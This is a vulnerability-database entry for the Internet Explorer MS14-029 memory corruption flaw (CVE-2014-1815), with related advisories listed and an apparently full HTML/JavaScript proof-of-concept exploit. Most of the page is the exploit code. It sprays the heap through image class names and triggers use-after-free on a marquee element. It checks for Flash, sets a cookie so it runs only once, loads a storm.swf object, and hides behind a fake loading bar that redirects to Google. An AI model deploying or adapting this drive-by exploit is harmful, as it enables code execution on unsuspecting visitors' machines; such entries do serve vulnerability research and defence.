Microsoft Internet Explorer MS14-029 Memory Corruption

🗓️ 29 Aug 2014 00:00:00Reported by PhysicalDrive0Type

packetstorm🔗 packetstormsecurity.com👁 51 Views

Microsoft Internet Explorer MS14-029 Memory Corruptio

Reporter	Title	Published	Views	Family All 16
0day.today	Internet Explorer MS14-029 Memory Corruption PoC	28 Aug 201400:00	–	zdt
BDU FSTEC	The vulnerability of the Internet Explorer browser, which allows a malicious individual to execute arbitrary code or trigger a service failure.	5 Jul 201600:00	–	bdu_fstec
Circl	CVE-2014-1815	31 Aug 202503:01	–	circl
Check Point Advisories	Microsoft Internet Explorer Memory Corruption (MS14-029: CVE-2014-1815)	13 May 201400:00	–	checkpoint_advisories
CVE	CVE-2014-1815	14 May 201410:00	–	cve
Cvelist	CVE-2014-1815	14 May 201410:00	–	cvelist
Kaspersky	KLA10602 Multiple vulnerabilities in Microsoft Internet Explorer	9 Sep 201400:00	–	kaspersky
NVD	CVE-2014-1815	14 May 201411:13	–	nvd
OpenVAS	Microsoft Internet Explorer Multiple Vulnerabilities (2962482)	14 May 201400:00	–	openvas
Prion	Memory corruption	14 May 201411:13	–	prion

`<!doctype html>  
<html>  
<head>  
<meta http-equiv="Cache-Control" content="no-cache"/>  
<script >  
function stc()  
{  
var Then = new Date();  
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );  
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();  
}  
function cid()  
{  
var swf = 0;  
try {  
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {  
}  
if (!swf)  
return 0;  
var cookieString = new String(document.cookie);  
if(cookieString.indexOf("d93kaj3Nja3") == -1)  
{stc(); return 1;}else{ return 0;}  
}  
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}  
var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);  
var ll=new Array();  
for (i=0;i<3333;i++)ll.push(document.createElement("img"));  
for(i=0;i<3333;i++) ll[i].className=tpx;  
for(i=0;i<3333;i++) ll[i].className="";  
CollectGarbage();  
function b2()  
{  
try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}  
try{xdd.outerText='';}catch(exception){}  
CollectGarbage();  
for(i=0;i<3333;i++) ll[i].className=tpx;  
}  
function a1(){  
if (!cid())  
return;  
document.body.contentEditable="true";  
try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}  
try{document.selection.createRange().select();}catch(exception){}  
}  
</ script >  
</head>  
<body onload='setTimeout("a1();",2000);' onresize=b2()>  
<marquee id=xdd > </marquee>  
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">  
<param name="movie" value="storm.swf" />  
<param name="quality" value="high" />  
<param name="bgcolor" value="#ffffff" />  
<param name="allowScriptAccess" value="sameDomain" />  
<param name="allowFullScreen" value="true" />  
</object>  
</body>  
<body>  
<form name=loading>  
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>  
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">  
¡¡¡¡  
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">  
¡¡¡¡<script > ¡¡  
var bar=0¡¡  
var line="||"¡¡  
var amount="||"¡¡  
count()¡¡  
function count(){¡¡  
bar=bar+2¡¡  
amount =amount + line¡¡  
document.loading.chart.value=amount¡¡  
document.loading.percent.value=bar+"%"¡¡  
if (bar<99)¡¡  
{setTimeout("count()",500);}¡¡  
else¡¡  
{window.location = "http://www.google.com.hk";}¡¡  
}</ script >  
¡¡</p>  
</form>  
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>  
</body>  
</html>  
  
`

29 Aug 2014 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.40232